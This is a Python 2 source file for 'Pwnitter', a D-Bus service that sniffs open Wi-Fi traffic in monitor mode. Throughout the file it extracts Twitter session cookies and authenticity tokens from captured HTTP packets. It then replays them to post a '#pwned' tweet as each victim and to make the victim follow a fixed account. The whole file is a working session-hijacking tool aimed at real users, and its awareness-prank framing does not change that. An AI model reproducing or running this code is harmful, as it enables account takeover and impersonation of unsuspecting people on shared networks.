#!/scratchbox/tools/bin/python
# On Linux (as root):
#  * apt-get install libpcap0.8 python-pypcap python-dpkt
#  * iw wlan0 interface add mon0 type monitor && ifconfig mon0 up
#  * ./idiocy.py -i mon0
            
import dbus.service
import dbus.mainloop.glib
import getopt, sys, pcap, dpkt, re, httplib, urllib
import logging
import logging.config
import socket
import time
import gobject
import select
import subprocess
import urllib2

status = 'I browsed twitter insecurely, got #pwned and all I got was this lousy tweet.'

def usage(): 
    print >>sys.stderr, 'Usage: %s [-i device]' % sys.argv[0] 
    sys.exit(1)

NAME = 'de.cryptobitch.muelli.Pwnitter'

class Pwnitter(dbus.service.Object):
    def __init__(self, bus, object_name, device='mon0', run_once_only=False):
        super(Pwnitter, self).__init__(bus, object_name)
        self.device = device
        
        self.status = status
        self.is_running = False
        self.run_once_only = run_once_only

    def setup_monitor(device='mon0'):
        # FIXME: Replace hardcoded interface 
        cmd = '/usr/sbin/iw wlan0 interface add mon0 type monitor'.split()
        subprocess.call(cmd)
        cmd = '/sbin/ifconfig mon0 up'.split()
        subprocess.call(cmd)
    
    @dbus.service.method(NAME,
                         in_signature='', out_signature='')
    def Start(self, filename=None):
        # FIXME: Prevent double Start()
        if filename is None: # Then we do *not* want to read from a PCap file but rather a monitor device
            self.setup_monitor(device)
            device = self.device
        else: # We have given a filename, so let's make PCap read from the file
            device = filename
        self.is_running = True
        try:
            self.cap = pcap.pcap(device)
        except OSError, e:
            print "Error setting up %s" % device
            raise e
        self.cap.setfilter('dst port 80')
        cap_fileno = self.cap.fileno()
        self.source_id = gobject.io_add_watch(cap_fileno, gobject.IO_IN, self.cap_readable_callback, device) 

    @dbus.service.method(NAME,
                         in_signature='s', out_signature='')
    def StartFromFile(self, filename):
        return self.Start(filename=filename)

    
    def cap_readable_callback(self, source, condition, device):
        return self.pwn(device, self.MessageSent)
        
    @dbus.service.signal(NAME)
    def MessageSent(self, who):
        print "Emitting MessageSent"
        return who
        return False
        pass

    @dbus.service.method(NAME,
                         in_signature='s', out_signature='')
    def SetMessage(self, message):
        self.status = message
        
    @dbus.service.method(NAME, #FIXME: This is probably more beauti with DBus Properties
                         in_signature='', out_signature='s')
    def GetMessage(self):
        return self.status


    def tear_down_monitor(self, device='mon0'):
        cmd = '/sbin/ifconfig mon0 down'.split()
        subprocess.call(cmd)
        cmd = '/usr/sbin/iw dev mon0 del'.split()
        subprocess.call(cmd)
    
    @dbus.service.method(NAME,
                         in_signature='', out_signature='')
    def Stop(self):
        self.is_running = False
        print "Receive Stop"
        gobject.source_remove(self.source_id)
        self.tear_down_monitor(self.device)
        loop.quit()


    def pwn(self, device, tweeted_callback=None, account_to_follow="attraktor_org"):
        log = logging.getLogger('pwn')
        
        processed = {}
        if self.is_running: # This is probably not needed, but I feel better checking it more than too less
            ts, raw = self.cap.next()
            eth = dpkt.ethernet.Ethernet(raw)
            log.debug('got a packet')
            # Depending on platform, we can either get fully formed packets or unclassified radio data
            if isinstance(eth.data, str):
                data = eth.data
            else:
                data = eth.data.data.data

            hostMatches = re.search('Host: ((?:api|mobile|www)?\.?twitter\.com)', data)
            if hostMatches:
                host = hostMatches.group(1)
                log.debug('Host matched %s', host)
                
                user_agent_matches = re.search('User-Agent: ([^\n]+)', data)
                if user_agent_matches:
                    user_agent = user_agent_matches.group(1)
                    log.debug('Found UserAgent: %s', user_agent)
                else:
                    user_agent = "Mozilla/5.0"
                
                cookieMatches = re.search('Cookie: ([^\n]+)', data)
                log.debug('CookieMatches? %r', cookieMatches)
                
                if cookieMatches:
                    cookie = cookieMatches.group(1)
                    log.debug('yummie Cookie %r', cookie)

                    headers = {
                        "User-Agent": user_agent,
                        "Cookie": cookie,
                    }
                    
                    try:
                        page = urllib2.urlopen("https://%s/" % host).read()
                    except socket.error, e:
                        log.error(e)
                    else:
                        log.debug('Connected to host %s', host)
                        #log.debug("%s", page)
                        if '''<p id="signup-btn"><a href="/signup" id="signup_submit"''' in page:
                            log.info('Login in Page :-(')

                        # Newtwitter and Oldtwitter have different formatting, so be lax
                        authToken = ''

                        formMatches = re.search("<.*?auth.*?_token.*?>", page, 0)
                        if formMatches:
                            authMatches = re.search("value=[\"'](.*?)[\"']", formMatches.group(0))

                            if authMatches:
                                authToken = authMatches.group(1)
                                log.info('Found auth token %r', authToken)

                        nameMatches = re.search('"screen_name":"(.*?)"', page, 0)
                        if not nameMatches:
                            nameMatches = re.search('content="(.*?)" name="session-user-screen_name"', page, 0)

                        name = ''
                        if nameMatches:
                            name = nameMatches.group(1)
                            log.info('Found name %r', name)


                        # We don't want to repeatedly spam people
                        # Also proceed if we didn't find a name but are on the mobile page
                        if  not (name in processed)   or   ((not name) and host == 'mobile.twitter.com'):
                            headers = {
                                "User-Agent": "Mozilla/5.0",
                                "Accept": "application/json, text/javascript, */*",
                                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                                "X-Requested-With": "XMLHttpRequest",
                                "X-PHX": "true",
                                "Referer": "http://api.twitter.com/p_receiver.html",
                                "Cookie": cookie
                            }


                            log.debug('Issueing connection')
                            if self.run_once_only: # If we wanted to run once only, we make it stop now
                                self.is_running = False
                            
                            # FIXME: Get this function into the classes namespace (or so)
                            # FIXME: Do we need "auth_token" given that "follow_params" have to be given?
                            def follow(account_to_follow, auth_token, cookie, follow_url, follow_params):
                                """Follows an account by POST requesting the URL provided. The other necessary data needs to be given via the arguments.
                                
                                account_to_follow - The name of the account to be followed. Is going to be substituted into the the given follow_url
                                auth_token - The obtained auth token which is probably not even needed, because you have to fill the follow_params anyway
                                cookie - the obtained cookie for the session
                                follow_url - The URL that is POST requested after having account_to_follow substituted into the first "%s"
                                follow_params - the parameters that should go with the POST request
                                """
                                headers = {
                                    "User-Agent": "Mozilla/5.0",
                                    "Accept": "application/json, text/javascript, */*",
                                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                                    "X-Requested-With": "XMLHttpRequest",
                                    "X-PHX": "true",
                                    "Referer": "http://api.twitter.com/p_receiver.html",
                                    "Cookie": cookie
                                }
                                follow_url_complete = follow_url % account_to_follow
                                # FIXME: Think about adding threads to these time consuming requests as we are not necessarily interested in the result of that request
                                log.info('Trying to follow %s using %s', account_to_follow, follow_url_complete)
                                try:
                                    urllib2.urlopen(urllib2.Request(follow_url_complete, follow_params, headers))
                                except urllib2.HTTPError, e:
                                    log.error("Error following %s using %s: %s", account_to_follow, follow_url_complete, e)
                                
                            if host == 'mobile.twitter.com':

                                params = urllib.urlencode({
                                    'tweet[text]': self.status,
                                    'authenticity_token': authToken
                                })

                                conn = httplib.HTTPConnection("mobile.twitter.com")
                                conn.request("POST", "/", params, headers)
                                
                                # Now the follow stuff
                                                                        
                                def follow_mobile(account_to_follow, auth_token, cookie):
                                    FOLLOWING_MOBILE_URL = "http://mobile.twitter.com/%s/follow"
                                    # FIXME: The Referer should be set to http://mobile.twitter.com/%(account_to_follow)s
                                    follow_params = urllib.urlencode({
                                        'authenticity_token': auth_token,
                                    })
                                    return follow(account_to_follow, auth_token, cookie, FOLLOWING_MOBILE_URL, follow_params)
                                if account_to_follow:
                                    follow_mobile(account_to_follow, authToken, cookie)


                            else:

                                params = urllib.urlencode({
                                    'status': self.status,
                                    'post_authenticity_token': authToken
                                })

                                conn = httplib.HTTPConnection("api.twitter.com")
                                conn.request("POST", "/1/statuses/update.json", params, headers)

                                def follow_api(account_to_follow, auth_token, cookie):
                                    FOLLOWING_API_URL = "http://api.twitter.com/1/friendships/create/%s.json"
                                    follow_params = urllib.urlencode({
                                        'authenticity_token': auth_token,
                                    })
                                    return follow(account_to_follow, auth_token, cookie, FOLLOWING_API_URL, follow_params)


                                if account_to_follow:
                                    follow_api(account_to_follow, authToken, cookie)

                            response = conn.getresponse()
                            log.debug('Got response: %s', response.status)
                            if response.status == 200 or response.status == 302 or response.status == 403:

                                if name:
                                    processed[name] = 1

                                # 403 is a dupe tweet
                                if response.status != 403:
                                    log.info("Successfully tweeted as %s", name)

                                    if tweeted_callback:
                                        tweeted_callback(name)
                                else:
                                    log.info('Already tweeted as %s', name)
                                log.debug("%s, %s", response.status, response.reason)
                                log.debug("%s", response.read())                            

                            else:

                                log.error("FAILED to tweet as %s, debug follows:", name)
                                log.error("%s, %s", response.status, response.reason)
                                log.error("%s", response.read())

        return self.is_running # Execute next time, we're idle or stop if we wanted to run once and have processed a message successfully
    # FIXME: Ideally, check	whether Pcap has got data for us

def main():

    opts, args = getopt.getopt(sys.argv[1:], 'i:h')
    device = None
    for o, a in opts:
        if o == '-i':
            device = a
        else:
            usage()
    #pwn(device)



if __name__ == '__main__':
    from optparse import OptionParser
    parser = OptionParser("usage: %prog [options]")
    parser.add_option("-l", "--loglevel", dest="loglevel", 
                      help="Sets the loglevel to one of debug, info, warn, error, critical")
    parser.add_option("-s", "--session", dest="use_session_bus",
                      action="store_true", default=False,
                      help="Bind Pwnitter to the SessionBus instead of the SystemBus")
    parser.add_option("-1", "--single", dest="run_once_only",
                      action="store_true", default=False,
                      help="Make it send a single message only")
    (options, args) = parser.parse_args()
    loglevel = {'debug': logging.DEBUG, 'info': logging.INFO,
                'warn': logging.WARN, 'error': logging.ERROR,
                'critical': logging.CRITICAL}.get(options.loglevel, "warn")
    logging.basicConfig(level=loglevel)
    #logging.config.fileConfig('logging.conf') #FIXME: Have file configured logging
    log = logging.getLogger("Main")

    dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)

    if options.use_session_bus:
        session_bus = dbus.SessionBus()
    else:
        session_bus = dbus.SystemBus()
    name = dbus.service.BusName(NAME, session_bus)
    pwnitter = Pwnitter(session_bus, '/Pwnitter', run_once_only=options.run_once_only)
    #object.Start()

    loop = gobject.MainLoop()
    log.info("Running example signal emitter service.")
    # FIXME: This is debug code
    #gobject.idle_add(pwnitter.MessageSent)
    
    loop.run()
    print "Exiting for whatever reason"
    #main()
